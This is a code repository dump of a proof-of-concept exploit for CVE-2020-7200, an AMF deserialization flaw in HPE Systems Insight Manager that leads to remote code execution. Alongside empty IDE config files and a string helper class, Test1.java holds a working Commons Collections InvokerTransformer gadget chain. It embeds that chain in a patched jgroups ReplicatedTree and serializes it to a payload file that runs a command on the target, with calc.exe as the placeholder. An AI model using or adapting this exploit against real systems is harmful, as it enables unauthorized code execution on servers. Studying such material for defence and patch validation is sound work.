├── .idea ├── .gitignore ├── libraries │ ├── AgentRepair.xml │ ├── FastInfoset.xml │ ├── activation.xml │ ├── axis_1_4.xml │ ├── com_azalea_ufl_barcode_1_0.xml │ └── hpsim_util_web.xml ├── misc.xml └── modules.xml ├── ProjectSIM.iml ├── README.md ├── emp.ser ├── out └── production │ └── ProjectSIM │ ├── Strings$ToStringComparator.class │ ├── Strings.class │ ├── Test0.class │ └── Test1.class └── src ├── Strings.java ├── Test0.java └── Test1.java /.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Datasource local storage ignored files 5 | /../../../../../:\Research2020\hpe-sim\ProjectSIM\.idea/dataSources/ 6 | /dataSources.local.xml 7 | # Editor-based HTTP Client requests 8 | /httpRequests/ 9 | -------------------------------------------------------------------------------- /.idea/libraries/AgentRepair.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | -------------------------------------------------------------------------------- /.idea/libraries/FastInfoset.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /.idea/libraries/activation.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | -------------------------------------------------------------------------------- /.idea/libraries/axis_1_4.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /.idea/libraries/com_azalea_ufl_barcode_1_0.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /.idea/libraries/hpsim_util_web.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /ProjectSIM.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ProjectSIM 2 | HPE Systems Insight Manager (SIM) AMF Deserialization to RCE 3 | 4 | CVE-2020-7200 5 | 6 | This PoC is built by jang 7 | 8 | Thanks to @peterjson 9 | -------------------------------------------------------------------------------- /emp.ser: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testanull/ProjectSIM/ec0028d8e1f6b67b5d2688151c5df015fcd86a38/emp.ser -------------------------------------------------------------------------------- /out/production/ProjectSIM/Strings$ToStringComparator.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testanull/ProjectSIM/ec0028d8e1f6b67b5d2688151c5df015fcd86a38/out/production/ProjectSIM/Strings$ToStringComparator.class -------------------------------------------------------------------------------- /out/production/ProjectSIM/Strings.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testanull/ProjectSIM/ec0028d8e1f6b67b5d2688151c5df015fcd86a38/out/production/ProjectSIM/Strings.class -------------------------------------------------------------------------------- /out/production/ProjectSIM/Test0.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testanull/ProjectSIM/ec0028d8e1f6b67b5d2688151c5df015fcd86a38/out/production/ProjectSIM/Test0.class -------------------------------------------------------------------------------- /out/production/ProjectSIM/Test1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testanull/ProjectSIM/ec0028d8e1f6b67b5d2688151c5df015fcd86a38/out/production/ProjectSIM/Test1.class -------------------------------------------------------------------------------- /src/Strings.java: -------------------------------------------------------------------------------- 1 | import java.util.Arrays; 2 | import java.util.Comparator; 3 | import java.util.LinkedList; 4 | import java.util.List; 5 | 6 | public class Strings { 7 | public static String join(Iterable strings, String sep, String prefix, String suffix) { 8 | final StringBuilder sb = new StringBuilder(); 9 | boolean first = true; 10 | for (String s : strings) { 11 | if (! first) sb.append(sep); 12 | if (prefix != null) sb.append(prefix); 13 | sb.append(s); 14 | if (suffix != null) sb.append(suffix); 15 | first = false; 16 | } 17 | return sb.toString(); 18 | } 19 | 20 | public static String repeat(String str, int num) { 21 | final String[] strs = new String[num]; 22 | Arrays.fill(strs, str); 23 | return join(Arrays.asList(strs), "", "", ""); 24 | } 25 | 26 | public static List formatTable(List rows) { 27 | final Integer[] maxLengths = new Integer[rows.get(0).length]; 28 | for (String[] row : rows) { 29 | if (maxLengths.length != row.length) throw new IllegalStateException("mismatched columns"); 30 | for (int i = 0; i < maxLengths.length; i++) { 31 | if (maxLengths[i] == null || maxLengths[i] < row[i].length()) { 32 | maxLengths[i] = row[i].length(); 33 | } 34 | } 35 | } 36 | 37 | final List lines = new LinkedList(); 38 | for (String[] row : rows) { 39 | for (int i = 0; i < maxLengths.length; i++) { 40 | final String pad = repeat(" ", maxLengths[i] - row[i].length()); 41 | row[i] = row[i] + pad; 42 | } 43 | lines.add(join(Arrays.asList(row), " ", "", "")); 44 | } 45 | return lines; 46 | } 47 | 48 | public static class ToStringComparator implements Comparator { 49 | public int compare(Object o1, Object o2) { return o1.toString().compareTo(o2.toString()); } 50 | } 51 | } -------------------------------------------------------------------------------- /src/Test0.java: -------------------------------------------------------------------------------- 1 | import flex.messaging.io.SerializationContext; 2 | import flex.messaging.io.amf.*; 3 | import org.apache.commons.collections.LRUMap; 4 | 5 | import java.io.*; 6 | 7 | public class Test0 { 8 | public static void main(String[] args) throws Exception{ 9 | LRUMap lruMap = new LRUMap(); 10 | byte[] ser = serialize(lruMap); 11 | FileOutputStream fileOutputStream = new FileOutputStream("emp.ser"); 12 | fileOutputStream.write(ser); 13 | fileOutputStream.close(); 14 | } 15 | public static byte[] serialize(Object data) throws IOException { 16 | MessageBody body = new MessageBody(); 17 | body.setData(data); 18 | 19 | ActionMessage message = new ActionMessage(); 20 | message.addBody(body); 21 | 22 | ByteArrayOutputStream out = new ByteArrayOutputStream(); 23 | 24 | AmfMessageSerializer serializer = new AmfMessageSerializer(); 25 | serializer.initialize(SerializationContext.getSerializationContext(), out, null); 26 | serializer.writeMessage(message); 27 | 28 | return out.toByteArray(); 29 | } 30 | 31 | public static void deserialize(byte[] amf) throws ClassNotFoundException, IOException { 32 | ByteArrayInputStream in = new ByteArrayInputStream(amf); 33 | 34 | AmfMessageDeserializer deserializer = new AmfMessageDeserializer(); 35 | deserializer.initialize(SerializationContext.getSerializationContext(), in, null); 36 | deserializer.readMessage(new ActionMessage(), new ActionContext()); 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /src/Test1.java: -------------------------------------------------------------------------------- 1 | 2 | import flex.messaging.io.SerializationContext; 3 | import flex.messaging.io.amf.*; 4 | 5 | import javassist.*; 6 | import org.apache.commons.collections.Transformer; 7 | import org.apache.commons.collections.functors.ChainedTransformer; 8 | import org.apache.commons.collections.functors.ConstantTransformer; 9 | import org.apache.commons.collections.functors.InvokerTransformer; 10 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 11 | import org.apache.commons.collections.map.LazyMap; 12 | 13 | import org.jgroups.blocks.ReplicatedTree; 14 | 15 | 16 | import java.io.*; 17 | import java.lang.reflect.Field; 18 | import java.nio.file.Files; 19 | import java.util.*; 20 | 21 | public class Test1 { 22 | public static void main(String[] args) throws Exception{ 23 | ClassPool pool = ClassPool.getDefault(); 24 | CtClass ctClass = pool.get("org.jgroups.blocks.ReplicatedTree"); 25 | CtClass ctClass1 = pool.get("byte[]"); 26 | CtField ctField = new CtField(ctClass1, "state", ctClass); 27 | ctClass.addField(ctField); 28 | 29 | ctClass.removeMethod(ctClass.getDeclaredMethod("getState")); 30 | CtMethod ctMethod = CtNewMethod.make("public byte[] getState(){ return this.state; }", ctClass); 31 | ctClass.addMethod(ctMethod); 32 | 33 | ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); 34 | ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream); 35 | objectOutputStream.writeObject(getObject2("calc.exe")); 36 | objectOutputStream.close(); 37 | 38 | byte[] secondObj = byteArrayOutputStream.toByteArray(); 39 | 40 | ReplicatedTree replicatedTree = (ReplicatedTree) ctClass.toClass().getConstructor().newInstance(); 41 | Field f1 = replicatedTree.getClass().getDeclaredField("state"); 42 | f1.setAccessible(true); 43 | f1.set(replicatedTree, secondObj); 44 | 45 | byte[] ser = serialize(replicatedTree); 46 | 47 | FileOutputStream fileOutputStream = new FileOutputStream("emp.ser"); 48 | fileOutputStream.write(ser); 49 | fileOutputStream.close(); 50 | byte[] serContent = Files.readAllBytes((new File("emp.ser")).toPath()); 51 | deserialize(serContent); 52 | 53 | } 54 | public static byte[] serialize(Object data) throws IOException { 55 | MessageBody body = new MessageBody(); 56 | body.setData(data); 57 | 58 | ActionMessage message = new ActionMessage(); 59 | message.addBody(body); 60 | 61 | ByteArrayOutputStream out = new ByteArrayOutputStream(); 62 | 63 | AmfMessageSerializer serializer = new AmfMessageSerializer(); 64 | serializer.initialize(SerializationContext.getSerializationContext(), out, null); 65 | serializer.writeMessage(message); 66 | 67 | return out.toByteArray(); 68 | } 69 | 70 | public static void deserialize(byte[] amf) throws ClassNotFoundException, IOException { 71 | ByteArrayInputStream in = new ByteArrayInputStream(amf); 72 | 73 | AmfMessageDeserializer deserializer = new AmfMessageDeserializer(); 74 | deserializer.initialize(SerializationContext.getSerializationContext(), in, null); 75 | deserializer.readMessage(new ActionMessage(), new ActionContext()); 76 | } 77 | 78 | 79 | public static Serializable getObject2(final String command) throws Exception { 80 | 81 | final String[] execArgs = new String[] { command }; 82 | 83 | final Transformer[] transformers = new Transformer[] { 84 | new ConstantTransformer(Runtime.class), 85 | new InvokerTransformer("getMethod", new Class[] { 86 | String.class, Class[].class }, new Object[] { 87 | "getRuntime", new Class[0] }), 88 | new InvokerTransformer("invoke", new Class[] { 89 | Object.class, Object[].class }, new Object[] { 90 | null, new Object[0] }), 91 | new InvokerTransformer("exec", 92 | new Class[] { String.class }, execArgs), 93 | new ConstantTransformer(1) }; 94 | 95 | Transformer transformerChain = new ChainedTransformer(transformers); 96 | 97 | final Map innerMap = new HashMap(); 98 | 99 | final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); 100 | 101 | TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); 102 | 103 | HashSet map = new HashSet(1); 104 | map.add("foo"); 105 | Field f = null; 106 | try { 107 | f = HashSet.class.getDeclaredField("map"); 108 | } catch (NoSuchFieldException e) { 109 | f = HashSet.class.getDeclaredField("backingMap"); 110 | } 111 | 112 | f.setAccessible(true); 113 | HashMap innimpl = (HashMap) f.get(map); 114 | 115 | Field f2 = null; 116 | try { 117 | f2 = HashMap.class.getDeclaredField("table"); 118 | } catch (NoSuchFieldException e) { 119 | f2 = HashMap.class.getDeclaredField("elementData"); 120 | } 121 | 122 | f2.setAccessible(true); 123 | Object[] array = (Object[]) f2.get(innimpl); 124 | 125 | Object node = array[0]; 126 | if(node == null){ 127 | node = array[1]; 128 | } 129 | 130 | Field keyField = null; 131 | try{ 132 | keyField = node.getClass().getDeclaredField("key"); 133 | }catch(Exception e){ 134 | keyField = Class.forName("java.util.MapEntry").getDeclaredField("key"); 135 | } 136 | 137 | keyField.setAccessible(true); 138 | keyField.set(node, entry); 139 | 140 | return map; 141 | 142 | } 143 | 144 | 145 | } 146 | --------------------------------------------------------------------------------